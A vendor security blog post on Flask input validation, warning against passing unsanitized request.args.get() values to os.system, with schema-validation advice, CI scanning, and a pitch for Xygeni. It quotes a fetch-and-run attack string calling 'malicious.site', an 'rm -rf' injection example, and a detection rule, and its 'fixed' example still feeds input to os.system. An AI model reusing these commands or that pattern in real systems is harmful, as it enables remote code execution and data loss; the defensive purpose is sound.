request.get - input sanitization - flask security

Never trust a request.get() Without Sanitizing: How Input Kills Flask Security

The Trap Is Set: How request.get() Opens the Door

In 2023, a fintech startup deployed an internal Flask-based dashboard that allowed DevOps staff to trigger infrastructure tasks remotely. One of the routes used request.args.get(“cmd”) to retrieve a shell command from the query string and pass it directly to a system call.

This seemed safe under the assumption that only trusted users accessed the internal dashboard. However, due to a misconfigured reverse proxy, the service was exposed publicly for several hours. During that window, automated scanners detected the endpoint.

Attackers quickly exploited it using a crafted request like ?cmd=curl+http://malicious.site/evil.sh|sh, resulting in remote code execution (RCE). From there, they accessed AWS instance metadata and credentials, leading to data exfiltration and privilege escalation.

This wasn’t a sophisticated attack; it was enabled entirely by unvalidated input from request.get(). The application lacked authentication, and there was no input sanitization. Worse, no static analysis tools flagged the risk because the team assumed the app was safe due to its internal-only context.

This article is not about how to exploit such flaws. Its purpose is to help developers recognize this insecure pattern, understand the risks, and adopt secure coding practices to prevent similar incidents.

Exploit in Action: A Flask App Broken by Input

In this section, we showcase a minimal Flask app that demonstrates just how quickly things can go wrong when request.get() is used without validation. The simplicity of this example underscores the danger,  even a few lines of insecure code can expose your system to severe threats.

This endpoint takes a cmd parameter from the request and passes it directly to os.system(), allowing anyone who can access the endpoint to execute arbitrary system commands. No input checks, no input sanitization, no guardrails. This is a textbook example of how not to handle user input.

request.get

With no validation in place, attackers can exploit this by passing dangerous shell commands directly in the query string. For example, a simple request like curl ‘http://localhost:5000/run?cmd=rm+-rf+/some/dir’ could wipe critical directories. The command is executed as-is, with no filtering, giving the attacker remote code execution (RCE) capabilities.

The real danger is in how silently this vulnerability passes through development pipelines. Since there were no static analysis tools configured to detect unsafe patterns like unsanitized request.get(), and because the endpoint was believed to be used only internally, no one flagged the issue during code review. This common DevOps blind spot,  trusting internal environments and skipping validation for the sake of speed, allowed a critical vulnerability to reach production undetected.

Where It All Breaks: Common Dev Pitfalls

Many serious vulnerabilities in Flask applications originate not from complex logic, but from simple, repeated mistakes. When development speed is prioritized over security, certain risky patterns become normalized,  often without developers realizing their long-term consequences.

Here are the most common mistakes:

  • Using request.get() without validation or default values
    Developers often use request.args.get() to quickly extract parameters from a request. Without defaults or validation, this leads to unpredictable behavior, such as passing None into logic or allowing raw user input into dangerous operations.
  • Trusting external input without checks
    Whether the input comes from a public form, an API gateway, or an internal dashboard, it must be treated as untrusted. Assuming it’s safe simply because it’s behind a VPN or used by internal teams is a critical misjudgment.
  • Delegating security to third-party libraries without verifying behavior
    While libraries can abstract functionality, they shouldn’t be blindly trusted to enforce security. Always understand how they handle input, and wrap external code in your validation layers when necessary.
  • No type definitions or input validation in route handlers
    Flask allows dynamic typing and flexible request handling, but this can quickly lead to bugs or injection flaws. Without explicit type enforcement and schema validation, unexpected input can bypass logic or break downstream services.

These mistakes are often driven by the pressure to move fast,  to get a feature live or a fix deployed. But each shortcut chips away at the security of your application. Secure coding must be the standard, not an exception.

Why request.get() Is Risky by Default

At a glance, request.get(),  including its variants like request.args.get() and request.form.get(),  seems harmless and convenient. But beneath that simplicity lies a dangerous assumption: that incoming data is trustworthy.

This assumption is flawed. Whether you’re building a public API or an internal tool, client input must always be treated as untrusted. Yet in many development teams, especially when working with microservices or internal dashboards, there’s a tendency to skip validation “because it’s internal.” This mindset opens the door to critical vulnerabilities.

Why This Is Risky

  • No type enforcement: request.get() returns data as-is. It doesn’t validate type, format, or the presence of required fields.
  • Silent failures: If a key is missing, it returns None, often leading to unintended behavior or logic errors downstream.
  • No filtering: It does not strip or sanitize harmful input, leaving your app vulnerable to injection attacks.

The Illusion of Internal Safety

In microservice-heavy environments or tools behind VPNs, developers often rely on infrastructure boundaries as their primary defense. This leads to a false sense of security. Misconfigurations, leaked credentials, or an exposed service can quickly turn “internal only” into “publicly exploitable.” request.get() is not the problem;  blindly trusting it is. Without input validation, you’re giving attackers a direct line to your application’s logic, and potentially, to your infrastructure.

Secure the Flow: Validating User Input Correctly

The cornerstone of Flask security is simple: never process input without structured validation. Every piece of data your application receives,  whether from query parameters, forms, or APIs, must be treated as untrusted and rigorously validated before use.

Python’s ecosystem offers several mature libraries tailored to validating request data:

  • Marshmallow – Great for defining schemas and deserializing data.
  • Pydantic – Known for type-safe models; widely used in FastAPI, but works well in Flask too.
  • WTForms – Ideal for form handling and validation in traditional web apps.

These tools make it easy to define and enforce the structure, types, and constraints of user input.

What to Validate

  • Types: Ensure that integers are integers, strings are strings, and booleans are booleans.
  • Ranges and lengths: Set boundaries for numbers, and enforce minimum and maximum lengths for strings.
  • Required fields: Explicitly require the presence of certain parameters.
  • Patterns: Use regular expressions to validate expected formats like emails, tokens, or filenames.

Example with Marshmallow:

python
from marshmallow import Schema, fields, ValidationError

class CommandSchema(Schema):
    cmd = fields.String(required=True)

schema = CommandSchema()

@app.route('/run')
def run():
    try:
        args = schema.load(request.args)
        safe_cmd = sanitize_cmd(args['cmd'])  # whitelist-based sanitation
        os.system(safe_cmd)
    except ValidationError as e:
        return str(e), 400

Reusable Decorators for Clean Code

You can create decorators to apply validation consistently across multiple routes:

python
def validate_with(schema):
    def decorator(f):
        def wrapped(*args, **kwargs):
            try:
                validated = schema.load(request.args)
                return f(validated, *args, **kwargs)
            except ValidationError as e:
                return str(e), 400
        return wrapped
    return decorator

Bottom Line

Structured validation is not optional; it’s essential. Never trust raw input, even in internal systems. Always use schemas, always check types and formats, and always sanitize what you process.

DevSecOps Fixes: Pipeline Security, Shift Left

Security shouldn’t start in production; it should start the moment code is written. This is the core principle behind the “Shift Left” movement: catching security issues early in the development lifecycle before they ever reach runtime.

Enforce Security From the First Commit

To effectively catch risky use of request.get() and similar patterns, integrate security directly into your CI/CD pipeline. Here’s how:

  • Add SAST rules (Static Application Security Testing) to your workflow. These rules can detect dangerous code like unsanitized request.get() calls passed to system functions.
  • Automate checks using tools like Bandit, Semgrep, or custom scripts. Run them as part of GitHub Actions, GitLab CI, or Bitbucket Pipelines.
  • Define custom policies to flag insecure practices such as using request.args.get() without validation.

Block Mergers That Introduce Risk

Code that fails validation checks shouldn’t be allowed to merge. Preventing vulnerable commits from being merged enforces security discipline across teams and helps create a culture of accountability.

jobs:
  secure-check:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v2
      - name: Run Bandit
        run: bandit -r app/ -ll

By embedding automated security analysis in your pipeline, you catch issues as they’re introduced,  not after they’ve gone live. This reduces risk, saves time, and helps teams deploy Flask apps with confidence.

Don’t Trust the Package: Third-Party Risk

While third-party libraries can boost productivity, they can also silently introduce security vulnerabilities,  especially when it comes to input handling.

Real Risks from Insecure Packages

There have been cases where trusted libraries performed unsafe operations under the hood, such as reading user input using request.get() and passing it directly into functions like eval(), open(), or system commands. These flaws are often hidden behind layers of abstraction, making them harder to detect during code review.

For example, a utility meant to streamline file uploads used unsanitized query parameters to construct file paths,  a pattern that invited path traversal and unauthorized file access.

Transitive Dependencies: The Hidden Threat

Even if your direct dependencies are safe, transitive dependencies might not be. These are packages that your libraries depend on, and they can bring along risky behavior without your knowledge A minor update to a dependency deep in your stack could introduce an unsanitized request.get() usage in places you don’t control. This risk multiplies in microservices and internal tools that rely heavily on smaller, niche libraries.

What to Do?

  • Audit dependencies regularly, including transitive ones.
  • Use tools like pip-audit, Safety, or GitHub Dependabot to scan for known vulnerabilities.
  • Manually review how external packages handle user input, especially if they interact with routes or request parameters.

Never assume a package,  no matter how small or well-known, enforces your security standards. Always validate externally sourced input before it enters your application logic.

Developer Hygiene: DevSecOps Education and Culture

Building secure applications isn’t just about tools; it’s about culture. Teams must internalize security as part of their development identity. This means making secure coding, especially input validation, a non-negotiable part of every workflow.

Make Input Validation Part of Code Reviews

Every code review should ask:

  • Is user input being validated?
  • Are schemas or type checks in place?
  • Is raw input passed into logic or commands?

Encouraging these checks during peer reviews fosters a mindset where security is everyone’s job,  not just the security team’s.

Define Secure Coding Policies for Flask APIs

Establish internal guidelines that spell out:

  • How to handle request input (never trust request.get() without validation)
  • When and how to use libraries like Marshmallow or Pydantic
  • Requirements for using decorators and schema validation in routes

Make these policies part of your onboarding and documentation.

Tools to Detect Unsafe Patterns

Use automation to catch risky patterns early and consistently:

  • Linters: Tools like flake8, pylint, or ruff can be extended with plugins to detect misuse of request.get().
  • Pre-commit hooks: Automatically scan for dangerous patterns before code is even committed.
  • Static analyzers: Tools like Bandit, Xygeni, or Semgrep can flag insecure input handling, missing validation, or unsafe data flows.

Build the Culture

Security isn’t just technical,  it’s behavioral. When validation is second nature, when reviews prioritize safety, and when tooling enforces standards automatically, your team becomes resilient by design.

Xygeni: How It Prevents These Issues

Xygeni helps close that door from the moment code is written. It’s a security automation platform that detects dangerous patterns,  like unsanitized request.get() usage,  as early as the first commit.

Early Detection by Design

Xygeni scans every commit and pull request to identify insecure use of request.get() and similar anti-patterns. It flags instances where input is not validated before being passed to critical functions like os.system, eval, or file operations.

This proactive approach ensures that risky code never silently reaches production.

Block Insecure Merges Automatically

Beyond detection, Xygeni allows teams to enforce policies that prevent insecure code from being merged. These policies are customizable, letting organizations define what’s acceptable and what’s not based on their internal Flask security standards.

pattern: “request\.args\.get\([‘\”]\w+[‘\”]\)”

condition: “used in os\.system or open() or exec()”

action: “block”

Seamless CI/CD Integration

Xygeni integrates effortlessly with platforms like:

Whether you’re using cloud-based CI or self-hosted pipelines, Xygeni fits into your workflow without disruption, enforcing Flask security policies consistently across every repo.

By embedding security checks directly into your development pipeline, Xygeni ensures that unsafe patterns are caught early, reviewed quickly, and fixed before they cause harm.

Final Punch: Clean Input or Be Compromised

It’s important to emphasize: this is not just a Flask security problem. The core issue is trusting user input, regardless of the framework or environment.

Unvalidated input is a universal threat vector; it leads to remote code execution, data breaches, privilege escalation, and ultimately loss of control over your systems. That’s why validation must be treated as a first-class concern in all development processes. Validate everything. Assume nothing. Sanitize always.

Validation is not optional. It’s not a “nice to have.” It’s a non-negotiable part of secure software development. Failing to validate input is like leaving your front door open in a dangerous neighborhood; someone will eventually walk in.

Whether you’re building APIs for public consumption or internal services behind VPNs, input must be validated and sanitized. Every parameter, every form field, every query string,  always.

The best practices outlined in this article, schema-based validation, static code analysis, secure pipelines, and cultural hygiene, are essential to defending against the abuse of request.get() and similar unsafe patterns.

sca-tools-software-composition-analysis-tools
Prioritize, remediate, and secure your software risks
7-day free trial
No credit card required

Secure your Software Development and Delivery

with Xygeni Product Suite